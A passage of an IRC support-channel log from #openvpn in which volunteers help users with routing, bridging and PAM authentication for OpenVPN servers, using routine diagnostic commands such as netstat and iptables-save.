yesterday to be such, never heard of this file. Useless completely, for me. 01:44 <+pekster> Same output you can get in your stndard log output by sending SIGUSR2 01:44 <+pekster> It just keeps it separatly for people who want it output more often 01:44 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 01:44 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 01:44 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Read error: Connection reset by peer] 01:48 < hid3> Okay, one more question. Can I have 'server 192.168.0.0 255.255.255.0' in my config file combined with 'push "route 192.168.0.0 255.255.248.0"' line? Won't that cause any routing/reachability problems? 01:50 <+pekster> That's valid, although clients will get both the more specific /24 route and also get pushed the larger /21 01:50 < hid3> great, thanks 01:50 <+pekster> They'll both be sent via the VPN tunnel, so it doesn't really matter 01:51 <+pekster> THat's kind of a bad network range to push given the potential for conflict with home-routing equipment 01:53 < hid3> not a problem for me (I'm the only user here) 01:53 < hid3> home network gets 10.x.x.x or 172.x.x.x 01:57 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 02:00 < hid3> connection reset by bear 02:01 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 02:01 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 02:01 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 02:02 -!- mode/#openvpn [+o krzee] by ChanServ 02:07 -!- mattock is now known as mattock_afk 02:12 -!- sickness\ is now known as Sickness\ 02:14 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Ping timeout: 260 seconds] 02:15 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 02:16 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 245 seconds] 02:18 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 02:20 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 02:20 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 02:20 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 02:20 -!- mode/#openvpn [+o krzee] by ChanServ 02:20 <@krzee> annoyance after annoyance 02:21 <@krzee> i told this netgear router to use 8.8.8.8 for dns, it has nowhere to change what DNS is given to connected clients (only gives itself), but it is not handling dns itself 02:21 <@krzee> yayfun! 02:22 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Remote host closed the connection] 02:28 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 02:31 <+pekster> A better router krzee needs to go advance his plight. When reading in iambic time these rules will set you right. 02:34 <@krzee> hahaha 02:38 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 264 seconds] 02:41 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 02:51 -!- mattock_afk is now known as mattock 03:10 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:33 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 03:42 -!- _mnathani_ [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 03:46 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [Ping timeout: 260 seconds] 03:54 <@krzee> !forget inline 03:54 <@vpnHelper> Joo got it. 03:54 <@krzee> i should contact jjk and let him know inline is slightly different than that 03:55 <@krzee> no [inline], just the xml style 03:55 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 03:58 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 04:00 <@krzee> and BOOYA its working 04:01 <@krzee> vpn server is on dynamic ip, behind 2 nat routers 04:01 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 272 seconds] 04:01 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 04:01 <@krzee> currently watching the camera system from an iphone's 4g 04:01 * krzee punches himself for even doing this 04:12 -!- ade_b [~Ade@95.209.143.40.bredband.tre.se] has joined #openvpn 04:12 -!- ade_b [~Ade@95.209.143.40.bredband.tre.se] has quit [Changing host] 04:12 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 04:20 -!- zz_AsadH is now known as AsadH 04:38 -!- _mnathani_ is now known as mnathani 04:45 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Ping timeout: 276 seconds] 04:49 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 04:53 -!- APTX_ [APTX@unaffiliated/aptx] has joined #openvpn 04:53 -!- APTX [APTX@unaffiliated/aptx] has quit [Ping timeout: 245 seconds] 04:54 -!- LEDfan [~quassel@94-226-126-193.access.telenet.be] has joined #openvpn 04:56 -!- dazo_afk is now known as dazo 05:04 -!- b1rkh0ff [~b1rkh0ff@178.77.7.143] has quit [Quit: Leaving] 05:05 -!- b1rkh0ff [~b1rkh0ff@178.77.7.143] has joined #openvpn 05:05 -!- b1rkh0ff [~b1rkh0ff@178.77.7.143] has quit [Read error: Connection reset by peer] 05:08 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 05:08 -!- APTX_ [APTX@unaffiliated/aptx] has quit [Ping timeout: 245 seconds] 05:09 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn 05:12 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 05:22 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 272 seconds] 05:29 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 05:34 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Ping timeout: 255 seconds] 05:37 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 05:38 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 256 seconds] 05:38 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 06:21 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 06:32 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 06:55 -!- cosmicgate [~root@94.249.242.85] has joined #openvpn 06:55 < cosmicgate> !paste 06:55 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 06:55 < cosmicgate> !logs 06:55 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 06:57 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Read error: Connection reset by peer] 06:59 < AsadH> ssssh cosmicgate 07:02 -!- master_of_master [~master_of@p57B553B8.dip.t-dialin.net] has quit [Ping timeout: 240 seconds] 07:03 -!- hid3 [~arnoldas@78.157.71.116] has left #openvpn [] 07:04 -!- master_of_master [~master_of@p57B53D36.dip.t-dialin.net] has joined #openvpn 07:19 -!- pa__ [~pa@host55-12-dynamic.61-82-r.retail.telecomitalia.it] has joined #openvpn 07:20 -!- mcp [~mcp@wolk-project.de] has quit [Excess Flood] 07:21 -!- mcp [~mcp@wolk-project.de] has joined #openvpn 07:33 -!- Valcorb [~Valcorb@84.198.139.192] has joined #openvpn 07:37 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has quit [Ping timeout: 240 seconds] 07:38 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn 07:41 -!- defswork [~andy@141.0.50.105] has joined #openvpn 07:43 < defswork> should I be able to run multiple client vpn connections from the same IP address ? 07:45 < cosmicgate> sure why not 07:45 < defswork> (to the same server) 07:46 < defswork> I get MULTI: bad source address from client errors in logs 07:46 <@plaisthos> Theorecically yes but if you aksing such a question it does probaably not do what you want 07:47 <@plaisthos> !nobind 07:47 <@vpnHelper> "nobind" is Do not bind to local address and port. The IP stack will allocate a dynamic port for returning packets. Since the value of the dynamic port could not be known in advance by a peer, this option is only suitable for peers which will be initiating connections by using the --remote option. 07:47 < defswork> we have a remote site with openvpn tunnel router to router 07:47 < defswork> and when laptop users go there and forget they start a road warrior openvpn connection over the same internet connection 07:48 < cosmicgate> ./usr/bin/openvpn -daemon server.conf 07:49 < defswork> hmm ok - nobind on all the clients 07:50 < defswork> that will still be an issue if multiple clients choose the same port though ? 07:51 <@plaisthos> you need to use tls-server for that at least 07:51 < defswork> I do 07:52 < defswork> it's not something I specifically want to support - it's just the fallout it causes when someone does it 07:52 < defswork> I could block internal client vpn connections outbound 07:56 -!- mcp [~mcp@wolk-project.de] has quit [Excess Flood] 07:56 -!- c3vin [~c3vin@70.62.198.163] has joined #openvpn 07:57 -!- mcp [~mcp@wolk-project.de] has joined #openvpn 08:02 -!- mcp [~mcp@wolk-project.de] has quit [Ping timeout: 276 seconds] 08:08 -!- emcepe [~mcp@wolk-project.de] has joined #openvpn 08:13 -!- cpm [~Chip@pdpc/supporter/active/cpm] has joined #openvpn 08:17 <@dazo> defswork: most of the days, I'm running several OpenVPN clients simultaneously ... but they're all to different networks, though 08:18 -!- erry is now known as yrre 08:19 -!- yrre is now known as erry 08:23 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 08:33 -!- nickanderson_afk is now known as nickanderson 08:58 < fys> http://www.newegg.com/Product/Product.aspx?Item=N82E16833122179 08:58 < fys> Opinions on this switch for a small office? 08:58 <@vpnHelper> Title: Newegg.com - NETGEAR 48 Port Stackable Gigabit Smart Switch w 2 Combo 4 SFP ports - Lifetime Warranty GS748TS (at www.newegg.com) 08:59 -!- Dashers [dash@home.aligrant.com] has joined #openvpn 09:00 < Dashers> I cannot get traffic to return to my client over an ethernet bridge, can anybody help? 09:00 < Dashers> OVPN has eth0 and tap0, both without IP addresses which are bridged with br0. 09:01 < Dashers> My client connects and gets an IP address from a DHCP server behind eth0. 09:01 < Dashers> I can ping between the server and the client 09:01 < Dashers> When I try to ping from the client to a host behind the server, the remote machine receives the request and replies, but the reply doesn't make it back to the client. 09:02 < Dashers> There are no firewalls running 09:03 < Dashers> NB. This is tap not tun, so no L3 routing involved. 09:05 -!- emcepe is now known as mcp 09:05 < _quadDamage> !1918 09:05 <@vpnHelper> "1918" is (#1) RFC1918 makes three unique netblocks available for private use: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 or (#2) see also: http://en.wikipedia.org/wiki/Private_network or http://www.faqs.org/rfcs/rfc1918.html or (#3) Too lazy to find your own subnet? Try this one: http://scarydevilmonastery.net/subnet.cgi 09:06 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Quit: Leaving] 09:11 -!- cpm [~Chip@pdpc/supporter/active/cpm] has quit [Quit: cpm] 09:11 -!- djc [~djc@gentoo/developer/djc] has joined #openvpn 09:11 -!- djc [~djc@gentoo/developer/djc] has left #openvpn [] 09:16 -!- EugeneKay [eugene@madeitwor.se] has quit [Remote host closed the connection] 09:16 -!- [Xaronic] is now known as frankensquirrel 09:17 -!- EugeneKay [eugene@madeitwor.se] has joined #openvpn 09:18 -!- amir [~amir@unaffiliated/amir] has quit [Remote host closed the connection] 09:19 -!- frankensquirrel is now known as [Xaronic] 09:20 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Ping timeout: 252 seconds] 09:22 < Dashers> Anybody? 09:24 < EugeneKay> Nobody. 09:29 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 09:33 -!- gladiatr [~sdspence@24.124.30.22] has joined #openvpn 09:33 -!- gladiatr [~sdspence@24.124.30.22] has quit [Changing host] 09:33 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 09:38 < _quadDamage> Dashers: I've never had any problems with my smaller managed Netgears. I know of one very large organization in particular that uses them (the extra reliability deemed not worth the price...keep spares). 09:39 < _quadDamage> sorry fys ^^^ 09:40 < _quadDamage> also, "extra reliability" as compared to Cisco, Juniper, et al. I'm apparently braindead this morning 09:40 <@ecrist> s/this morning// 09:41 < _quadDamage> My biggest complaint with the smaller units (not sure if 48-ports are the same) is the lack of 64-bit SNMP counters. 09:42 < _quadDamage> and I did have an external power supply flake out...after 6 years. 09:42 -!- b1rkh0ff [~b1rkh0ff@178.77.4.218] has joined #openvpn 09:47 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 09:49 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 09:59 < Dashers> Well I've figured out my problem. My Openvpn bridge is not updating the ethernet frames with the correct mac address. 09:59 < Dashers> But I doubt anybody here can help me with that... 09:59 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Quit: off to do some thoughtcrime] 10:00 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 264 seconds] 10:06 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 10:07 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 10:07 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 10:10 < _quadDamage> Dashers: OpenVPN should not be reframing traffic. Does the OpenVPN server see replies from the remote server? 10:10 < Dashers> Nope 10:10 -!- cosmicgate [~root@94.249.242.85] has quit [] 10:14 -!- raidz_away is now known as raidz 10:16 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 272 seconds] 10:20 -!- Orbi [~opera@anon-149-235.vpn.ipredator.se] has joined #openvpn 10:29 < _quadDamage> Dashers: does the destination mac of the reply match the source mac of the request? is this the mac of the client tap? 10:29 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 10:47 < Dashers> FIgured it, ESXi was blocking it 10:49 -!- LEDfan [~quassel@94-226-126-193.access.telenet.be] has quit [Remote host closed the connection] 10:49 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 10:51 -!- Dashers [dash@home.aligrant.com] has quit [Quit: leaving] 10:52 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 11:03 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has quit [Remote host closed the connection] 11:05 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has joined #openvpn 11:11 < EugeneKay> Promiscuous mode? 11:14 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 11:14 < hg_5> hello 11:19 -!- hazardous [~dbn@void.kassad.in] has quit [Changing host] 11:19 -!- hazardous [~dbn@openvpn/user/hazardous] has joined #openvpn 11:19 -!- mode/#openvpn [+v hazardous] by ChanServ 11:22 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 11:22 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Remote host closed the connection] 11:22 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 11:23 < hg_5> hello, what that means ;p "Next, ask yourself if you would like to allow network traffic between client2's subnet (192.168.4.0/24) and other clients of the OpenVPN server" ? 11:26 <@krzee> hg_5, are you really asking us to ex[plain a walkthrough? 11:26 <@krzee> !walkthrough 11:26 <@vpnHelper> "walkthrough" is if you are using some walkthrough and now you are here cause you have problems and dont understand your setup, type !howto and !man and try to actually learn what you're doing. most those docs about openvpn from google SUCK. 11:26 <@krzee> :D 11:27 < hg_5> can you describe difference between routing client subnet and allow network traffic between client2 and other client? 11:33 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has joined #openvpn 11:33 -!- SpookZa [~SpookZA@197.87.128.172] has left #openvpn [] 11:36 <@krzee> hg_5, 11:36 <@krzee> !route 11:36 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 11:36 <@krzee> from client to client by vpn ip has a shortcut 11:36 <@krzee> !c2c 11:36 <@vpnHelper> "c2c" is "client-to-client" is with this option packets from 1 client to another are routed inside the server process. without it packets leave the server process, hit the kernel (firewall, routing table) and if allowed by firewall and routed back to server process, they go to the client. you use this option when you do not want to use selective firewall rules on what clients can access things behind 11:36 <@vpnHelper> other clients 11:39 < hg_5> ok simple: if i will add just this http://pastebin.com/6CeysgLy , will i be able to ping client from my router? 11:41 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 256 seconds] 11:58 -!- WDKevin [~WDKevin@173-163-136-177-centralpennsylvania.hfc.comcastbusiness.net] has joined #openvpn 11:59 < WDKevin> I'm having trouble getting my home server to allow me to connect through OpenVPN. I've set the directives to use username/password authentication and I'm trying to have it authenticate against the actual users on that server. Can someone help me with the config to do this? 12:00 -!- AsadH is now known as zz_AsadH 12:17 < fys> WDKevin: you bet your ass i can 12:17 < WDKevin> well alrighty then 12:17 < fys> http://z20k.com/post/37792613220/openvpn-pam 12:17 <@vpnHelper> Title: z20k.com - OpenVPN + PAM (at z20k.com) 12:17 < WDKevin> wow 12:18 < WDKevin> your an angel 12:18 < fys> I like to think so. 12:18 < fys> :D 12:18 < fys> I looked for that exact config for hours until I found it, so I re-posted it on my domain for if this ever happened. 12:18 < WDKevin> that is beautiful 12:18 < fys> :D 12:18 < WDKevin> im ssh'd into my home vpn server, i should be able to do this all remotely, right? 12:19 < fys> Yeah, for sure. 12:20 < WDKevin> excellent 12:20 < WDKevin> now, i do still need a server certificate, right? 12:20 < fys> Yeah. 12:20 < WDKevin> ok 12:20 < WDKevin> i have one i generated initially, i suspect i will need to regenerate one though after i change some config options 12:20 < fys> but that's -all- you need. 12:20 < WDKevin> good 12:20 < WDKevin> server.conf, right? 12:20 < WDKevin> or is it ca.crt? 12:21 < fys> ca.crt 12:21 < WDKevin> ok 12:21 < fys> I deploy our employees w/ a viscocity (osx openvpn client) with that file included. 12:21 < WDKevin> right 12:21 < WDKevin> thats what im going to do 12:21 < fys> then simply add them to the openvpn server. 12:21 < fys> easy peasy 12:21 < WDKevin> just keep a zip hidden on my web server somewhere that i can grab when i need it 12:22 < WDKevin> your post here, am i posting all that into server.conf? 12:22 < WDKevin> err wait 12:22 < WDKevin> nevermind 12:22 < WDKevin> i see some commands too 12:22 < fys> everything but the iptables rules 12:22 < fys> yeah 12:22 < WDKevin> whats the port, proto and dev lines? 12:22 < WDKevin> just common fyi's? 12:23 < fys> it just sends your /dev/tun0 traffic out eth0 12:23 < fys> which you need it to do 12:23 < WDKevin> but where do i put those 3 lines? 12:23 < fys> oh 12:23 < fys> you issue them as commands 12:23 < WDKevin> ok 12:23 < fys> What distro are you on? 12:23 < WDKevin> ubuntu 12:23 < fys> Ah, I'm not sure how the iptables rules are saved on Ubuntu. 12:23 < WDKevin> i have tun0 already setup 12:23 < fys> I think You have to do it manually. 12:24 < WDKevin> im able to connect to my vpn server already, i just cant auth 12:24 < fys> Your path is probably different for the pam auth .so 12:24 < fys> that config is from CentOS 12:24 < WDKevin> i find it earlier 12:24 < WDKevin> its actually the same 12:24 < fys> Seriously>? 12:24 < fys> weird 12:24 < WDKevin> it was different from the openvpn docs 12:24 < WDKevin> but it matches what you have 12:24 < fys> Oh wait. 12:25 < fys> that makes perfect sense actually 12:25 < fys> because my openvpn box at home is debian 12:25 < fys> forgot about that.. 12:25 < WDKevin> haha 12:25 < WDKevin> that explains it 12:25 < fys> :D 12:25 < WDKevin> so 12:25 < WDKevin> yea 12:25 < WDKevin> what the hell am i doing with this post? lol 12:25 < fys> well 12:25 < fys> do you have your ca.crt and server keys? 12:26 < WDKevin> yes 12:26 < WDKevin> i have them from when i initially generated them 12:26 < WDKevin> as in i have them on the server 12:26 < fys> if you don't mind keeping the subnets i defined 12:26 < fys> you should be able to copy and paste the config into server.conf 12:26 < fys> replace the filenames with yours 12:26 < WDKevin> from the port line down to the username-as-common-name line? 12:26 < fys> no, the keys and crts 12:26 < fys> cert /etc/openvpn/easy-rsa/keys/greed.crt 12:26 < WDKevin> yea 12:26 < fys> like yours would be servername.crt 12:26 < WDKevin> but i mean the copy/paste part 12:27 < fys> ohhh 12:27 < fys> yes 12:27 < WDKevin> copy everything from port down to username-as-common into my server.conf then make the changes to the key locations and the ip subnets? 12:27 < fys> username-as-common-name 12:27 < fys> would be the last name of the server.conf 12:27 < WDKevin> line* 12:27 < WDKevin> you mean, right? 12:28 < WDKevin> also, im not actually looking to funnel my traffic 12:28 < WDKevin> i just want to get onto my lan 12:28 < WDKevin> so can i drop the push route line? 12:28 < fys> no 12:29 < fys> that handles routing the vpn subnet 12:29 < fys> otherwise you won't be able to address your LAN 12:29 < WDKevin> oh ok 12:29 < WDKevin> i just need to change the 10. ip to my actual vpn servers ip? 12:30 < fys> no 12:30 < fys> that's the vpn subnet 12:30 < fys> you'd leave it as-is 12:30 < WDKevin> oh ok 12:30 < WDKevin> same with the server line too? 12:30 < fys> yup 12:30 < fys> you could literally make that any private ip subnet you want 12:31 < fys> as long as it doesnt overlap with your existing lans 12:31 < hg_5> hey, this configuration will be correct http://puu.sh/1Yq4c ? i added route .... and push .... to 192.168.7.0 12:31 < WDKevin> fys, my existing lans is all on 192.168.1 12:31 < fys> ah then you're good 12:32 < WDKevin> im good keeping them at 10.0whatever you have? 12:33 < fys> yeah 12:33 < WDKevin> and then issue the iptables into the terminal? 12:33 < WDKevin> line by line? 12:33 < fys> hg_5: why are you pushing 2 routes that have nothing to do with the server subnet 12:33 < fys> WDKevin: yeah, but be careful copying and pasting sometimes dashes get converted weird. 12:33 < WDKevin> i noticed the " came over as . 12:33 < WDKevin> so i will make sure on those lines too 12:34 < fys> yeah 12:34 < WDKevin> now question 12:34 < WDKevin> should i be able to at least connect without running those iptables commands? 12:34 < WDKevin> or are thjose crucial to authenticating? 12:34 < fys> yeah 12:34 < WDKevin> ok 12:34 < WDKevin> because im still getting the same error 12:34 < fys> check what the server log says 12:34 < WDKevin> ah, good point 12:34 < WDKevin> lol 12:35 < fys> :D 12:35 < hg_5> fys i need to see clients connected to vpn client router 12:35 < WDKevin> where the hell is the openvpn log? 12:35 < fys> you define it 12:35 < WDKevin> found it 12:35 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 12:35 < WDKevin> i was looking in /va/rlog 12:36 < fys> ah 12:36 < fys> yeah 12:36 < fys> i should probably do that in my config, move it to /var/log 12:36 < WDKevin> do i want openvpn.log or openvpn-status.log? 12:36 < WDKevin> neither one really shows me anything worth anything 12:37 < fys> have you restarted the vpn daemon since changing the file? 12:37 < WDKevin> yes 12:37 < fys> what error are you getting? 12:38 < WDKevin> ConnectionRefusedError: 10061: No connection could be made because the target machine actively refused it.. 12:38 < WDKevin> i wonder if thats a router port forwarding issue 12:38 < fys> sounds like it 12:38 < WDKevin> though i have port forwarding already setup for this 12:38 < fys> udp port 1194? 12:38 < WDKevin> yup 12:38 < fys> and it's allowed on that box? 12:39 < fys> just as a test 12:39 < WDKevin> should be 12:39 < fys> disable iptables 12:39 < fys> then try 12:39 < WDKevin> im logging into my router now 12:39 < fys> werd 12:39 < WDKevin> i have port 1194, both, forwarding to that box on port 1194 12:39 < fys> now on that box 12:39 < fys> disable iptables for a second 12:39 < WDKevin> when i do an nmap localhost, i do not see 1194 12:41 < WDKevin> shouldnt i see port 1194 when i nmap that box? 12:41 < fys> do this 12:41 < fys> netstat netstat -ltnup | grep 1194 12:41 < fys> er 12:41 < fys> netstat -ltnup | grep 1194 12:42 < WDKevin> udp 0 0 0.0.0.0:1194 0.0.0.0:* 4051/openvpn 12:42 < WDKevin> got that 12:42 < WDKevin> those 0's look like they could be problamatic 12:42 < fys> nope 12:42 < WDKevin> all good? 12:42 < fys> that just means it's listening on all interfaces 12:42 < fys> yeah 12:42 < WDKevin> strange 12:43 < WDKevin> i dont have to forward any additional ports on the router? 12:43 < fys> no 12:43 < fys> http://serverfault.com/questions/129086/how-to-start-stop-iptables-on-ubuntu 12:43 <@vpnHelper> Title: How to start/stop iptables on Ubuntu? - Server Fault (at serverfault.com) 12:43 < fys> i wish iptables was as easy on ubuntu as it is on CentOS 12:43 < fys> bleh 12:43 < WDKevin> heh 12:44 < WDKevin> i dont have any iptables rules 12:44 < fys> iptablnes -nL shows nothing? 12:44 < WDKevin> shows accept on everything 12:44 < fys> that's weird because if your router is forwarding it to that box 12:45 < WDKevin> input accept, forward accept and output accept 12:45 < fys> and openvpn is listening on that box 12:45 < WDKevin> should i be warding to the eth0 ip or the tun0 ip? 12:45 < fys> eth0 12:45 < fys> actually 12:45 < WDKevin> that might be the problem 12:45 < fys> if it's being port forwarded 12:45 < WDKevin> im forwarding to the br0 port 12:45 < fys> it'd be your public ip 12:45 < fys> so do this 12:46 < fys> curl -s icanhazip.com 12:46 < fys> from that box 12:46 < fys> and -that- is the ip your client should be connecting to 12:46 < WDKevin> dont have curl installed 12:46 < fys> gah 12:46 < fys> brb meeting 12:46 < WDKevin> wait 12:46 < WDKevin> its hitting my public ip 12:46 < WDKevin> im ssh'd into the same boxc 12:49 < hg_5> fys what should i write then ? 12:49 -!- zz_AsadH is now known as AsadH 12:57 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 13:08 -!- [1]c3vin [~c3vin@70.62.198.163] has joined #openvpn 13:08 < fys> sorry guys 13:08 < fys> got called into a meeting with the owner 13:09 -!- c3vin [~c3vin@70.62.198.163] has quit [Ping timeout: 240 seconds] 13:09 -!- [1]c3vin is now known as c3vin 13:14 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 245 seconds] 13:14 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds] 13:15 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 245 seconds] 13:21 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 264 seconds] 13:22 < hg_5> fys are you there? 13:22 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 13:23 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 13:23 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:23 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn 13:42 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 13:45 < WDKevin> fys, no problem, i just got back from lunch myself 13:48 <+pekster> WDKevin: You're trying to do what, expose a LAN behind the openvpn server? 13:48 < WDKevin> give me a holler when you get back fys 13:48 < WDKevin> pekster, im trying to just get connected and authenticated against the current users 13:48 < WDKevin> fys got me setup with his config that does the same thing, but i cant seem to get connected 13:48 < WDKevin> we went through and verified the ports are open, and forwarded on my router 13:48 < WDKevin> but then he got called aside 13:49 < WDKevin> i dont know if my interfaces file is misconfigured or what, but my openvpn.log has nothing in it about connection attempts 13:50 <+pekster> Server is running on RFC1918 IP space? If so, start there and work back to the router, verifying firewalls/NAT setup is valid 13:50 <+pekster> 'iptables-save' will give you a complete view of the server's firewall (assuming Linux as the OS) 13:51 < WDKevin> the vpn server is on ubuntu. ipstables -nL shows accept for incoming, forwarding and outgoing 13:51 <+pekster> Use iptables-save 13:51 < WDKevin> i have dd-wrt on the router, which is forwarding port 1194 to the server 13:51 <+pekster> Other tables can impact things too (mangle, nat, etc) 13:52 < WDKevin> do you want me to pastie the output of iptables-save? 13:52 <+pekster> iptables -L is a bastard child that no one who actually works with netfilter seriously likes very much 13:52 <+pekster> Please. Let's start at the end and work out 13:52 < WDKevin> thats fine 13:52 < WDKevin> just tell me what to do 13:52 < WDKevin> and so you know, im at work, ssh'd into my vpn server 13:52 <+pekster> No worries 13:53 < WDKevin> so start with iptables-save? 13:54 <+pekster> Yup. No point in checking the router's forwarding until we know your server is configured to accept the traffic 13:54 < WDKevin> one quick quesiton, also. in my router, should i be forwarding the port to the ip of eth0 or br0 on my vpn server? 13:54 <+pekster> The one holding your LAN IP. If that's confusing, please also pastebin the output of 'ip addr show' 13:54 < WDKevin> output of iptables-save: http://pastie.org/private/n6yrsb4hrzqyw8cgrnnow 13:54 <@dazo> WDKevin: if bridging eth0 with something else as br0 .... eth0 should not have an IP at all ... only br0 should have the IP 13:55 <+pekster> Okay, completely open ruleset with no mangle or nat tables loaded, so that's fine 13:55 < WDKevin> output of ip addr show: http://pastie.org/private/d07nevghool58pusqvvjfa 13:55 < WDKevin> im thinking the br0 is half the problem 13:55 <+pekster> Probably 13:55 <+pekster> brctl show dev br0 13:55 < WDKevin> run that? 13:55 <@dazo> eth0 and br0 both have the IP 192.168.1.101/24 ... that will fail 13:55 < WDKevin> i had openvpn working before and i dont remember ever having a br0 13:56 < WDKevin> but when i followed the guide on ubuntu.com this time it had me set one up 13:56 <@dazo> WDKevin: why do you bridge? 13:56 <+pekster> You probalby don't need a bridge at all 13:56 < WDKevin> i dont think i do 13:56 <@dazo> https://community.openvpn.net/openvpn/wiki/BridgingAndRouting 13:56 <@vpnHelper> Title: BridgingAndRouting – OpenVPN Community (at community.openvpn.net) 13:56 < WDKevin> i did remove it from the interfaces file, but after running service networking restart its still there 13:57 <+pekster> I'd tell you to just remove the bridge, but if you mess it up and loose the LAN IP you'll loose remote access. That's likely your issue, or at least one of them 13:57 <+pekster> If you know your netnwork config is good you can schedule a cron to reboot in 10 minutes or so if you do loose control 13:57 